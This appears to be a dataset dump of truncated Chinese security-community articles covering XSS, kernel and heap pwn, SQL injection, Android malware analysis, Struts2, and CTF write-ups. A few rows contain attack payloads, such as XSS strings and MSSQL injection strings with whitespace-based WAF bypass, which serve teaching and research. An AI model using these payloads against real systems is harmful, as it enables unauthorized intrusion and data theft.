text stringlengths 100 9.93M | category stringclasses 11
values |
|---|---|
# XSS利用中的一些小坑
##### 译文声明
本文是翻译文章,文章原作者 mwrinfosecurity,文章来源:labs.mwrinfosecurity.com
原文地址:<https://labs.mwrinfosecurity.com/blog/getting-real-with-xss/>
译文仅供参考,具体内容表达以及含义原文为准。
## 0x00 前言
随着时间的推移,简单使用`<script>alert(1)</script>`和`python –m
SimpleHTTPServer`的黄金年代已经不复存在。现在想通过这些方法在locahost之外实现XSS(Cross-Site
Scripting)以及窃取数... | 社区文章 |
在hctf中遇到了这么一个题,也借这个题专门去补了补自己在_IO_FILE这一块知识点的知识。
#### libio.h中的结构
struct _IO_FILE {
int _flags; /* High-order word is _IO_MAGIC; rest is flags. */
#define _IO_file_flags _flags
/* The following pointers correspond to the C++ streambuf protocol. */
/* Note: Tk uses the _IO_read_ptr and _IO_... | 社区文章 |
**作者:[启明星辰ADLab](https://mp.weixin.qq.com/s/rLglxs08lZ9e4iYqR4xxUQ
"启明星辰ADLab") **
近日,启明星辰ADLab使用最新上线的智能合约监控系统发现了大量以太坊智能合约的攻击事件。在众多攻击案例中,有些漏洞成因或攻击模式少有研究涉及,也出现了一些比较隐蔽的攻击链。本文将对这些攻击案例进行详细分析。
#### 使用Oraclize服务的疏忽
为了将区块链技术应用到线下,例如将飞机延误险、数字货币兑换等业务上链,区块链需要具有访问链外数据的能力。但是如果智能合约直接从外部服务获取数据,由于网络延迟,节点处理速度等各种原因,会导致每个结点获取的数据不同,使区块链的... | 社区文章 |
亲爱的白帽子们
还记得我们8、9月份的3重奖励不,不记得的看这里回顾([https://xianzhi.aliyun.com/notice/detail.htm?spm=a2c0h.8049718.0.0.tSdAko&id=33)。](https://xianzhi.aliyun.com/notice/detail.htm?spm=a2c0h.8049718.0.0.tSdAko&id=33)。)
又到了9月获奖公告这一激动人心的时刻啦。
活动一:九月月度奖励,最高奖励一万元,获奖的白帽子如下:
第1名:九江墨眉网络科技有限公司,积分1125分;奖励人民币税后10000元。
第2名:kernel _dbg,积分960分... | 社区文章 |
# linux-kernel-pwn-ciscn2017-babydriver
##### 译文声明
本文是翻译文章,文章原作者 平凡路上,文章来源:平凡路上
原文地址:<https://mp.weixin.qq.com/s/HGzihicoSldq4tTO6IQ0JA>
译文仅供参考,具体内容表达以及含义原文为准。
作者:平凡路上
上一篇文章利用栈溢出介绍了基本的内核中利用rop以及ret2usr来进行提权的两种方式,其中更常用的会是用ret2usr,因为完全使用rop是很费力的一件事情。
为了防止内核执行用户代码导致提权发生的情况的发生,出现了`smep`(Supervisor Mode Execution Protection... | 社区文章 |
**作者:LoRexxar'@知道创宇404实验室**
**日期:2019年6月12日**
**英文版本:<https://paper.seebug.org/954/>**
2019年6月11日,RIPS团队在团队博客中分享了一篇[MyBB <= 1.8.20: From Stored XSS to
RCE](https://blog.ripstech.com/2019/mybb-stored-xss-to-rce/),文章中主要提到了一个Mybb18.20中存在的存储型xss以及一个后台的文件上传绕过。
其实漏洞本身来说,毕竟是需要通过XSS来触发的,哪怕是储存型XSS可以通过私信等方式隐藏,但漏洞的影响再怎么严重也有限,... | 社区文章 |
# 如何Fuzz ELF文件中的任意函数
##### 译文声明
本文是翻译文章,文章原作者 hugsy,文章来源:blahcat.github.io
原文地址:<https://blahcat.github.io/2018/03/11/fuzzing-arbitrary-functions-in-elf-binaries/>
译文仅供参考,具体内容表达以及含义原文为准。
## 一、前言
最近我准备测试一下[LIEF](https://lief-project.github.io/)项目,可执行文件解析器并不是一项新的技术(可以参考其他解决方案,如[pyelftools](https://github.com/eliben/pyel... | 社区文章 |
**译者:知道创宇404实验室翻译组
原文链接:<https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html>**
Squirrelwaffle的常规操作是发送恶意垃圾邮件回复现有电子邮件链,今天我们要调查它利用 Microsoft Exchange Server
漏洞(ProxyLogon 和 ProxyShell)的策略。
9月,Squirrelwaffle
作为一种新的加载器出现,并通过垃圾邮件攻击传播。它向已存在的电子邮件链回复恶意邮... | 社区文章 |
**作者:天融信阿尔法实验室
原文链接:<https://mp.weixin.qq.com/s/Y4mGVhbc3agp1adnUs1GmA>**
## 前言
安全研究员`vakzz`于4月7日在hackerone上提交了一个关于gitlab的[RCE漏洞](https://hackerone.com/reports/1154542
"hackerone gitlab
rce"),在当时并没有提及是否需要登录gitlab进行授权利用,在10月25日该漏洞被国外安全公司通过日志分析发现未授权的[在野利用](https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-t... | 社区文章 |
# KBuster:以伪造韩国银行APP的韩国黑产活动披露
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 背景
360威胁情报中心近期发现一例针对韩国手机银行用户的黑产活动,其最早活动可能从2018年12月22日起持续至今,并且截至文档完成时,攻击活动依然活跃,结合木马程序和控制后台均为韩语显示,我们有理由认为其是由韩国的黑产团伙实施。
其攻击平台主要为Android,攻击目标锁定为韩国银行APP使用者,攻击手段为通过仿冒多款韩国银行APP,在诱骗用户安装成功并运行的前提下,
**窃取用户个人信息** ,并远程 **控制用户手机** ,以便跳过用户直接与银行连线验证,从而 **窃取用户个人... | 社区文章 |
**作者:scz@绿盟科技
来源:[绿盟科技博客](http://blog.nsfocus.net/unconventional-means-uploading-downloading-binary-files/?from=timeline&isappinstalled=0 "绿盟科技博客")**
文中演示了3种数据映射方案,有更多其他编解码方案,这3种够用了。前面介绍的都是bin与txt的相互转换,各种编码、解码。假设数据传输通道只有一个弱shell,有回显,可以通过copy/paste无损传输可打印字符。为了将不可打印字节传输过去,只能通过编解码进行数据映射。
## od+xxd
2000年时我和tt在一台远程主机上想把其中... | 社区文章 |
# 滥用 Microsoft Windows 内置程序来传播恶意软件
|
##### 译文声明
本文是翻译文章,文章原作者 MAX GANNON,文章来源:cofense.com
原文地址:<https://cofense.com/abusing-microsoft-windows-utilities-deliver-malware-fun-profit/>
译文仅供参考,具体内容表达以及含义原文为准。
去年, 我们观察到滥用平台内置功能进行攻击的恶意活动有所增加, 而整个业界普遍都会在各自平台中内置一些功能.
我们发布的报告[2018年恶意软件回顾](https://cofense.com/whitepaper/malware-r... | 社区文章 |
# 【技术分享】Windows PsSetLoadImageNotifyRoutine的0day漏洞
|
##### 译文声明
本文是翻译文章,文章来源:breakingmalware.com
原文地址:<https://breakingmalware.com/documentation/windows-pssetloadimagenotifyroutine-callbacks-good-bad-unclear-part-1/>
译文仅供参考,具体内容表达以及含义原文为准。
****
****
译者:[ **anhkgg**](http://bobao.360.cn/member/contribute?uid=2894976744)... | 社区文章 |
# 记一起通过邮件传播的恶意程序攻击
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
近日,360沙箱云和360安全情报中心监测到一起通过邮件传播的恶意程序攻击。恶意程序通过电子邮件发送给受害者,并通过邮件正文和附件诱导用户执行附件中的恶意程序,来实现入侵。
经过360沙箱云高级威胁分析平台分析和安全专家分析确认,此攻击样本是臭名昭著的 Mydoom
蠕虫病毒。该病毒通过受感染的计算机发送垃圾邮件进行传播,并通过品牌仿冒和伪造来欺骗和诱导用户,实现传播扩散的目的。在这篇文章中,我们将通过自动化分析和专家分析的方式,向大家呈现这起恶意程序攻击的更多细节。
背景信息
最近几个月,我们多次监测到此病毒及... | 社区文章 |
# 0x00 引子
前段做的一个滴滴CTF的安卓题目,题目并不难,主要分享一下做题过程和思路,如有不对请表哥们指出。
# 0x01 要求与提示
赛题背景:本挑战结合了Android, Java, C/C++,加密算法等知识点,考察了挑战者的binary逆向技术和加密算法能力。
赛题描述:本题是一个app,请试分析app中隐藏的key,逆向加密算法并得到对应的秘钥。可以在app中尝试输入key,如果正确会显示“correct”,如果错误会显示“Wrong”。
提 示:阅读assembly code,理解xor的加密逻辑和参数,解出答案。
评分标准:key正确则可进入下一题。
Flag格式为:DDCTF-XXXXXXXXXXXX... | 社区文章 |
功能
一款python编写的轻量级弱口令检测脚本,目前支持以下服务:FTP、MYSQL、MSSQL、MONGODB、REDIS、TELNET、ELASTICSEARCH、POSTGRESQL。特点
命令行、单文件,绿色方便各种情况下的使用。
无需任何外库以及外部程序支持,所有协议均采用socket与内置库进行检测。
兼容OSX、LINUX、WINDOWS,Python 2.6+(更低版本请自行测试,理论上均可运行)。
参数说明
python F-Scrack.py -h 192.168.1 [-p 21,80,3306] [-m 50] [-t 10]
-h 必须输入的参数,支持ip(192.168.1.... | 社区文章 |
# RedpwnCTF 2020 Web Writeup
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
> 国外的一场比赛,好多题没写出来,赛后这几天从github上下了dockerfile
> 复现学习一下。web题很新颖,基本上都是nodejs写成,且除几个题外都给了源码,收获满满。
> ps. 复现的时候官方环境还没关
>
> <https://github.com/redpwn/redpwnctf-2020-challenges>
## web/static-pastebin
> I wanted to make a website to store bits of text, ... | 社区文章 |
本次测试为授权测试。注入点在后台登陆的用户名处
存在验证码,可通过删除Cookie和验证码字段绕过验证
添加一个单引号,报错
and '1'='1
连接重置——被WAF拦截
改变大小写并将空格替换为MSSQL空白符[0x00-0x20]
%1eaNd%1e'1'='1
查询数据库版本,MSSQL 2012 x64
%1eoR%1e1=@@version%1e--
查询当前用户
%1eoR%1e1=user%1e--
查询当前用户是否为dba和db_owner
;if(0=(SelEct%1eis_srvrolemember('sysadmin'))) WaItF... | 社区文章 |
# 【技术分享】ThinkPHP5 SQL注入漏洞 && PDO真/伪预处理分析
##### 译文声明
本文是翻译文章,文章来源:leavesongs.com
原文地址:<https://www.leavesongs.com/PENETRATION/thinkphp5-in-sqlinjection.html>
译文仅供参考,具体内容表达以及含义原文为准。
刚才先知分享了一个漏洞( https://xianzhi.aliyun.com/forum/read/1813.html
),文中说到这是一个信息泄露漏洞,但经过我的分析,除了泄露信息以外,这里其实是一个(鸡肋)SQL注入漏洞,似乎是一个不允许子查询的SQL注入点。
漏洞上下文... | 社区文章 |
自己开发webcrack的过程,希望能跟大家分享一下。
>
> 注:本工具借鉴吸收了TideSec的[web_pwd_common_crack](https://github.com/TideSec/web_pwd_common_crack)很多优秀的思路,在此基础上增加了很多拓展功能使其更加强大,在这里给TideSec的大佬点个赞!
## 前言
在做安全测试的时候,随着资产的增多,经常会遇到需要快速检测大量网站后台弱口令的问题。
然而市面上并没有一个比较好的解决方案,能够支持对各种网站后台的通用检测。
所以WebCrack就应运而生。
## 工具简介
WebCrack是一款web后台弱口令/万能密码批量爆破、检测工具。
不仅支持如... | 社区文章 |
# 手把手教你如何从Whois数据中收集到有价值的情报
|
##### 译文声明
本文是翻译文章,文章来源:webbreacher
原文地址:<https://webbreacher.com/2016/08/09/harvesting-whois-data-for-osint/>
译文仅供参考,具体内容表达以及含义原文为准。
前言
在我的日常工作中,我经常需要去查找某些域名是否已经被我们公司的员工注册了。由于公司的组成结构和部门划分的问题,可能公司已经有人注册过这些域名了,可是我们有时却无法在第一时间得知这些信息。
现在很多公司或个人都会选择使用
GoDaddy,PSI,或者1&1等全球域名注册服务商来进行域名注册和登记。与此同时,... | 社区文章 |
本次是对zzcms2021前台一个可能的写配置文件的点进行分析(已交cnvd,不知道收不收呀),为什么说是可能,各位师傅往下看就好啦
从官网下载最新源码后,本地搭建环境进行分析
主要利用在/3/ucenter_api/api/uc.php中
在/3/ucenter_api/api/uc.php中,通过get传参code,再将_authcode解密后的code利用parse_str解析并赋值给$get
跟进到_authcode函数:
function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
$ckey_l... | 社区文章 |
# StoryDroid:为安卓应用程序自动生成故事板
##### 译文声明
本文是翻译文章,文章原作者 Sen Chen, Lingling Fan, Chunyang Chen, Ting Su, Wenhe Li, Yang
Liu, Lihua Xu,文章来源:ieeexplore.ieee.org
原文地址:<https://ieeexplore.ieee.org/document/8812043>
译文仅供参考,具体内容表达以及含义原文为准。
最近对Android的自动化测试工具开发感兴趣,故最近在考研期间可能会带来一些我认为有趣的关于Android自动化测试工具的论文翻译,啊,考研太累了啊 >
<
论文作者:Sen... | 社区文章 |
**作者:xisigr
PDF阅读:<https://images.seebug.org/archive/idn-visual-security-deep-thinking.pdf>**
* * * | 社区文章 |
作者: [Longas_杨叔](https://mp.weixin.qq.com/s/CrY6EHdQ4vjp58W6Yj8S-g "Longas_杨叔")
篇首语:
最近杨叔发了不少热图到朋友圈,有很多安全圈和系统内的朋友看了纷纷留言或私信,要求分享下法国参会MILIPOL军警展的收获,OK,趁着对场馆的欧洲美女们记忆尤新,赶紧发出来:)
注:出于某些考虑,杨叔已将部分厂商标识模糊化,仅做稍许示例,深入内容不做讨论。
#### 0x01 关于Milipol
MILIPOL PARIS
2017,全球三大军警装备展之一,两年一届,本届有来自150多个国家的近千个参展商,从新式武器、突袭装备、特种作战、侦控器材、通信管控、压制干扰..... | 社区文章 |
# 【技术分享】如何利用XSS窃取CSRF令牌
|
##### 译文声明
本文是翻译文章,文章来源:digi.ninja
原文地址:<https://digi.ninja/blog/xss_steal_csrf_token.php>
译文仅供参考,具体内容表达以及含义原文为准。
****
译者:[興趣使然的小胃](http://bobao.360.cn/member/contribute?uid=2819002922)
预估稿费:130RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
**一、前言**
隐藏令牌是保护重要表单信息免受 **CSRF** (Cross-Site Request
Forgery... | 社区文章 |
**作者:OneShell@知道创宇404实验室
时间:2021年7月27日**
IoT漏洞分析最为重要的环节之一就是获取固件以及固件中的文件系统。固件获取的方式也五花八门,硬核派有直接将flash拆下来到编程器读取,通过硬件调试器UART/SPI、JTAG/SWD获取到控制台访问;网络派有中间人攻击拦截OTA升级,从制造商的网页进行下载;社工派有假装研究者(学生)直接向客服索要,上某鱼进行PY。有时候千辛万苦获取到固件了,开开心心地使用`binwalk
-Me`一把梭哈,却发现,固件被加密了,惊不惊喜,刺不刺激。
如下就是针对如何对加密固件进行解密的其中一个方法:回溯未加密的老固件,从中找到负责对固件进行解密的程序,然后解密最... | 社区文章 |
**前言**
传统意义上来说,虽然来自巴西的银行恶意软件多多少少很简单,但近年来的网络攻击趋势揭示了一些新型且精细的攻击工具,这些从巴西开始的恶意软件很可能会被传播到世界范围的银行用户那里。在2017年5月,Talos小组分析了一个通过葡萄牙语垃圾邮件传播的银行木马,垃圾邮件是这种恶意软件常用的传播渠道。当打开邮件的附件时,一个恶意的JAR文件会被自动下载到受害者的机器上,该文件会运行恶意JAVA代码来启动恶意软件的安装进程。
直到现在,由于“Themida”文件高复杂度的特性,这个恶意软件的深层运作原理还未被揭开。但是多亏了Check
Point研究团队,我们已经能够对该恶意软件执行脱壳操作并揭露这个新变种的恶意软件是如何... | 社区文章 |
# 透视CobaltStrike(一)——PE类Beacon分析
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 背景
CobaltStrike作为先进的红队组件,得到了多个红队和攻击者的喜爱。2020年年底的时候,看到有人在传cs4.2,于是顺便保存了一份。然后一拖就到了今天才打开,关于CobaltStrike外层木马的分析网上已经有很多,但是内层的payload好像没有多少分析文章,那我就刚好借4.2这个契机,详细分析一下CobaltStrike的组件。
## 测试上线
为了使得文章更加完整,还是花少量的篇幅介绍一下CobaltStrike的基本使用,关于使用方面的详细介绍,可以在网... | 社区文章 |
# 前言
首先说点题外话,不感兴趣的师傅可以忽略
之前的S2-008、S2-009和S2-012漏洞形成都是由于一些参数限制不够完全导致(有攻击面的和攻击深度的
但是在分析中,却总感觉有些不尽人意的地方,好像少了点东西。可能还是太菜了,后期会试着补上
目前就不发出来当水文了,感兴趣的师傅可以看下
<http://www.kingkk.com/2018/09/Struts2-命令-代码执行漏洞分析系列-S2-008-S2-009/>
<http://www.kingkk.com/2018/09/Struts2-命令-代码执行漏洞分析系列-S2-012/>
然后才是关于这篇文章的
S2-014是对于S2-013修复不完整的造... | 社区文章 |
# 2021 ByteCTF-决赛 BabyHeaven 题解
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## BabyHeaven
Status: Done 🙌
关键算法: 字典序算法
出处: 2021 ByteCTF-Final
原题链接: <https://www.aliyundrive.com/s/vTGTA71VAGY>
时间: December 11, 2021
考点: Shellcode, Windows API, 天堂之门, 算法优化
难度: 困难
### 分析
1. 拿到题目,file 命令 check 一下,发现是一堆二进制数据,而非完... | 社区文章 |
### 0x01 前言
前两天一直在学习Python造轮子,方便自己前期信息收集,测试脚本进行批量扫描的时候,无意中点开的一个带有edu域名,便有此文
### 0x02 前期信息收集
Web整体架构:
操作系统: Ubuntu
Web服务器: Nginx+Java
端口开放信息: 80 443
目录扫描结果
### 0x03 挨个测试
可以看到,扫描到了一个"jira目录",猜想是Jupyter NoteBook组件.
访问果不其然,Jupyter组件的登陆点
其他3个有效目录都是登陆点
* gitlab
* owncloud
* confluence
我晕~要让我爆破吗,... | 社区文章 |
**作者: evilpan
博客: [PansLabyrinth](https://evilpan.com/2020/03/29/wifi-security/) **
**本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org**
本文主要分享WiFi相关的一些安全研究,以及分析几个实际的攻击案例,如PMKID、KARMA、Krack、Kr00k等。
# WiFi起源
WiFi是一种无线局域网协议(WLAN),经过多年的发展,WLAN基本上也等同于WiFi。史前时代的LAN可以追溯到1971年ALOHAnet提出的多址接入思想。
复现和利用思路分析**
**资讯类:**
* * *
美政府:... | 社区文章 |
## 前言
0ctf这道题目其实不需要对抗算法就能做出来了,主要是出题人抬了一手误差范围给大了。
虽然给了很多文件,不过其实大多数都没有用。
核心部分就是python flask框架搭建的web,keras搭建的神经网络,内置了训练好的h5模型。
所以tensorflow,keras,flask, numpy这些基本环境都需要安装,安装过程直接百度即可。
* * *
## 分析
查看app.py
核心函数index:
def index():
if request.method == 'POST' and request.form["submit"]==u"upload":
... | 社区文章 |
# CVE-2019-8449 JIRA 信息泄漏漏洞排查
# 0x00 前言
CVE-2019-8449 poc出了 排查了公司的资产,验证漏洞并推动了几个Jira站点的升级
# 0x01 漏洞详情
Atlassian Jira
8.4.0之前版本/rest/api/latest/groupuserpicker接口允许未授权查询员工信息,攻击者可以通过爆破用户名名单等方法获取用户信息
# 0x02 影响范围
影响版本: 7.12< 受影响版本<8.4.0
漏洞危害:未授权枚举用户名,导致用户信息泄露
漏洞评级:低危
# 0x03 排查
某JIRA站点jira.test.com
我以目标是虚假的情况下,jira.test.c... | 社区文章 |
# Typhoon靶机渗透测试
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
Typhoon这台靶机有比较多的漏洞,最多的就是由于配置不当导致漏洞。
## 靶机下载及配置
Typhoon靶机下载地址:[https://pan.baidu.com/s/18U0xwa9ukhYD4XyXJ98SlQ
](https://pan.baidu.com/s/18U0xwa9ukhYD4XyXJ98SlQ) 提取码: jbn9
Typhoon靶机ip: 192.168.56.150
kali攻击者ip: 192.168.56.1
## 知识点
nmap
dirb
hydra
msf... | 社区文章 |
# 网络协议-无线
## 实验目的
掌握无线认证的方式
掌握deauth攻击的原理与结果
掌握使用wireshark分析无线数据包
## 实验环境
* 操作机:Windows 7
* 实验工具:
* Wireshark2.2
* binwak for windows
## 实验内容
客户端与路由完成密钥交换的时间?(flag格式:flag{2015-09-01-12:05})
### 实验一
WEP已基本弃用,不安全。目前常用WPA2-presonal。WPA2包含一下几个点:预共享密钥;AES加密;CCMP完整性校验。
#### 方法一 了解无线协议
* 操作步骤详解
要了解的无线网... | 社区文章 |
# Bluetooth Low Energy 嗅探
|
##### 译文声明
本文是翻译文章,文章来源:http://drops.wooyun.org/
原文地址:<http://drops.wooyun.org/tips/9651>
译文仅供参考,具体内容表达以及含义原文为准。 | 社区文章 |
# 【技术分享】黑与被黑的五种最简单的方法
|
##### 译文声明
本文是翻译文章,文章来源:mcafee
原文地址:[http://www.mcafee.com/us/resources/white-papers/foundstone/wp-low-hanging-fruits.pdf?utm_content=buffer5ac97&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer](http://www.mcafee.com/us/resources/white-papers/foundstone/wp-low-hanging-fruits.pdf?utm... | 社区文章 |
先知技术社区独家发表本文,如需要转载,请先联系先知技术社区授权;未经授权请勿转载。
先知技术社区投稿邮箱:Aliyun_xianzhi@service.alibaba.com;
闲聊阿里加固(一)
Author:wnagzihxain
Create Time:2016.11.11
0x00 闲扯
1.为什么要写这些?
折腾了一段时间的Android加固,看了很多大牛的文章,收获还是蛮大的,不过好像大部分的文章都是直接写在哪里下断点如何修复之类的,写出如何找到这个脱壳点的文章还是比较少,所以我准备整理一下这部分的知识,讲讲如何找到脱壳点,我一直觉得当我们拿到一个未知的加固样本,学会去分析它,知道如何去分析它,才是最重要的,而不... | 社区文章 |
# 记一次从鸡肋SSRF到RCE的代码审计过程
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
> 作者:TheKingOfDuck[@0KEE](https://github.com/0KEE "@0KEE") TEAM
Python标准库中用来处理HTTP相关的模块是urllib/urllib2,不过其中的API十分零碎,比如urllib库有urlencode,但urllib2没有,经常需要混在一起使用,换个运行环境可能又无法正常运行,除了urllib和urllib2之外,会经常看到的还有一个urllib3,该模块是服务于升级的http
1.1标准,且拥有高效http连接池管理及http代理服... | 社区文章 |
# Shanghai-DCTF-2017 线下攻防Pwn题
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
作者:[beswing](https://www.anquanke.com/member/117601)
预估稿费:300
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
## 前言
这个题在现场的时候没有一个队伍做出来,我想估计都是被后面的洞给坑了吧。
题目和完整的exp可以从这里获取[链接](https://pan.baidu.com/s/1nuNQC9z)
## 分析
### 现场入坑
菜单栏中一共有五个选项,其中最容易引起我们注意的就是选项4, **test s... | 社区文章 |
## 前言
最近在做项目的过程中,利用蚁剑连接JSP的webshell连接数据库时,发现数据库html内容被解析了,开始以为这只是JSP
webshell编写的不严谨导致的,后来发现蚁剑自身的过滤同样存在问题。
## 发现过程
在做项目过程中,利用JSP webshell连接数据库时,发现html内容被蚁剑解析了
首先想到的是蚁剑在取出数据库的值后,过滤没有做严格导致html标签被渲染。于是我在本地搭建了个PHP环境,在数据库中写入XSS payload:
"><img src=1 onerror=alert`1`>
奇怪的是,并未触发XSS,由此推测触发XSS是有条件的
## 深入分析
首先考虑编码原因,由于目标中某些... | 社区文章 |
## 写在前面
本文不是对Struts2漏洞进行分析,而是对Struts2框架机制的一些简单的理解。这将有助于对Struts2漏洞进行深入的理解。
## 正文
Struts2历史上出现过大大小小几十个漏洞。在分析漏洞的时候,除了需要理解漏洞是如何触发的,我对Struts2框架的原理比较好奇。众所周知,Struts2是通过配置struts.xml来定义请求和处理该请求的Action之间的对应关系等等。
Struts.xml类似下图这样的形式
其中一个问题就是,Struts2是如何将请求和处理action通过struts.xml关联起来的?
其中的过程比较有意思,本文将简单针对这个机制的分析一下
Struts2官网给出的执行流程图如下
... | 社区文章 |
# 渗透测试实战-DC-1:1靶机入侵+Matrix2靶机入侵
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
大家好,靶机更新了爱写靶机实战的我又来了,文章最后有福利哦!!
## 靶机下载安装
DC-1下载地址:<https://pan.baidu.com/s/1BNwbssr5ezL6DP-_6AbB4w>
Matrix2下载地址:<https://pan.baidu.com/s/1hPqxVYwrC2rygeeAuurFMw>
## 实战
### DC-1:1入侵
下面开始第一步的征程了,我们先探测一下IP
靶机IP:172.16.24.46
继续使用nmap来开路
可以... | 社区文章 |
**作者:0x28@360高级攻防实验室
原文链接:<http://noahblog.360.cn/apache-storm-vulnerability-analysis/>**
## 0x00 前言
前段时间Apache Storm更了两个CVE,简短分析如下,本篇文章将对该两篇文章做补充。
[GHSL-2021-086: Unsafe Deserialization in Apache Storm supervisor -CVE-2021-40865
](https://securitylab.github.com/advisories/GHSL-2021-086-apache-storm/)
[GHSL-2021-... | 社区文章 |
**作者:慢雾安全团队**
虽然有着越来越多的人参与到区块链的行业之中,然而由于很多人之前并没有接触过区块链,也没有相关的安全知识,安全意识薄弱,这就很容易让攻击者们有空可钻。面对区块链的众多安全问题,慢雾特推出
**区块链安全入门笔记系列** ,向大家介绍十篇区块链安全相关名词,让新手们更快适应区块链危机四伏的安全攻防世界。
## 钱包 Wallet
钱包(Wallet)是一个管理私钥的工具,数字货币钱包形式多样,但它通常包含一个软件客户端,允许使用者通过钱包检查、存储、交易其持有的数字货币。它是进入区块链世界的基础设施和重要入口。
据 SlowMist Hacked 统计,仅 2018 年因“钓鱼”、“第三方劫持”等原因所造成的... | 社区文章 |
# 360CERT:CVE–2017–13156 Janus安卓签名漏洞预警分析
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
>
> 2017年7月31日GuardSquare向Google报告了一个签名漏洞并于当天收到确认。Google本月修复了该漏洞,编号CVE-2017-13156。
>
> 经过360CERT分析确认,该问题确实存在,影响较为严重。攻击者可以绕过签名验证机制构造恶意程序更新原有的程序。
## 0x01 事件概述
该漏洞产生的根源在于将DEX文件和APK文件拼接之后校验签名时只校验了文件的APK部分,而虚拟机执行时却执行了文件的DEX部分,导致了漏洞的发生。由于这种同时为... | 社区文章 |
# 第五届强网杯线上赛冠军队 WriteUp - Pwn 篇
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
**EzCloud**
题目注册了一些路由,能未登录访问的除了/login,/logout外只有/notepad,而漏洞就发生在/notepad里唯一一处使用malloc的地方。程序中初始化字符串(地址为0x9292,这里命名为create_string)的函数存在两个为初始化,一是若传入的value为空时,函数不做任何工作直接退出,二是create_string中的malloc申请内存后没有初始化。
使用create_string中的第二个未初始化可以leak出heap地址,虽然低位会被... | 社区文章 |
# 浅谈互联网公司业务安全
|
##### 译文声明
本文是翻译文章,文章来源:drops.wooyun.org
原文地址:<http://drops.wooyun.org/tips/8190>
译文仅供参考,具体内容表达以及含义原文为准。
**0x00 我理解的业务安全**
业务安全,按照百度百科的解释:业务安全是指保护业务系统免受安全威胁的措施或手段。广义的业务安全应包括业务运行的软硬件平台(操作系统、数据库等)、业务系统自身(软件或设备)、业务所提供的服务的安全;狭义的业务安全指业务系统自有的软件与服务的安全。
我的理解:某个平台上的业务是指该平台用户在使用过程中涉及到的一系列流程,而业务安全就是保证这些流程按照预定的规则运行... | 社区文章 |
# 动动手指就赚钱的“商机”?连续打卡红包还翻倍?
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
早起的鸟儿有虫吃,早起的人儿有钱赚。不知何时起,朋友圈一阵早起打卡风盛行,仅动动手指关注微信公众号,每日完成早起打卡任务,即可获得金额从几毛到几十块不等的红包,连续打卡红包金额还会翻倍,累计“收益”还能提现?似乎嗅到了“商机”……
可是,真有这样的便宜?
## 目前微信打卡主要有两种方式
### 第一种:预付挑战金
参与打卡活动的用户,需要预付挑战金。可自行选择挑战等级进行充值,所有挑战金全部在奖池里。每天在规定的时间内打卡,即可瓜分奖池里的奖金。金额取决于当天忘记打卡的人有多少。
### 第二种:... | 社区文章 |
# 区块链安全入门笔记(二) | 慢雾科普
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
虽然有着越来越多的人参与到区块链的行业之中,然而由于很多人之前并没有接触过区块链,也没有相关的安全知识,安全意识薄弱,这就很容易让攻击者们有空可钻。面对区块链的众多安全问题,慢雾特推出区块链安全入门笔记系列,向大家介绍十篇区块链安全相关名词,让新手们更快适应区块链危机四伏的安全攻防世界。
系列回顾:
[区块链安全入门笔记(一) | 慢雾科普](https://mp.weixin.qq.com/s/xv4nFJVgKxgXkH7lveCRgQ)
## 公链 Public Blockchain
公有链(Publ... | 社区文章 |
author:藏青@雁行安全团队
## 前言
分析漏洞的本质是为了能让我们从中学习漏洞挖掘者的思路以及挖掘到新的漏洞,而CodeQL就是一款可以将我们对漏洞的理解快速转化为可实现的规则并挖掘漏洞的利器。根据网上的传言Log4j2的RCE漏洞就是作者通过CodeQL挖掘出的。虽然如何挖掘的我们不得而知,但我们现在站在事后的角度再去想想,可以推测一下作者如何通过CodeQL挖掘到漏洞的,并尝试基于作者的思路挖掘新漏洞。
## 分析过程
首先我们要构建Log4j的数据库,由于`lgtm.com`中构建的是新版本的Log4j数据库,所以只能手动构建数据库了。首先从github获取源码并切换到2.14.1版本。
git clone h... | 社区文章 |
# Java安全-C3P0
## 简述
c3p0是用于创建和管理连接,利用“池”的方式复用连接减少资源开销,和其他数据源一样,也具有连接数控制、连接可靠性测试、连接泄露控制、缓存语句等功能。
## 原生反序列化利用
### 远程加载类
看一下YSO的利用链:
看起来像jndi注入。
先分析吧。
#### 利用链分析
`PoolBackedDataSourceBase`实现了`IdentityTokenized`
接口,此接口用于支持注册功能。每个DataSource实例都有一个identityToken,用于在C3P0Registry中注册。
还持有PropertyChangeSupport和VetoableChangeSuppor... | 社区文章 |
# 2021 蓝帽杯 Final RE Writeup
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## abc
题目中存在着大量的花指令来妨碍我们查看伪代码,我们这里尝试编写 IDAPython 脚本来去除花指令。
花指令分析
### **TYPE1**
call $+5
其实相当于往栈上写一个返回地址(0x400ECB),并且由于 CALL 指令的长度就是 5,所以实际上程序在执行 CALL 之后的 RIP
(0x400ECB)不变。
add qword ptr [rsp], 0Ch
相当于把前面压如的 RIP 地址 + 0xC,计算可以得知(0x400ECB + 0xC = 0x40... | 社区文章 |
## 0x00 前言
2018年1月底某CMS官方隆重发布6.0版本,调整了之前“漏洞百出”的框架结构,修(杜)复(绝)了多个5.X的版本后台Gestshell漏洞。
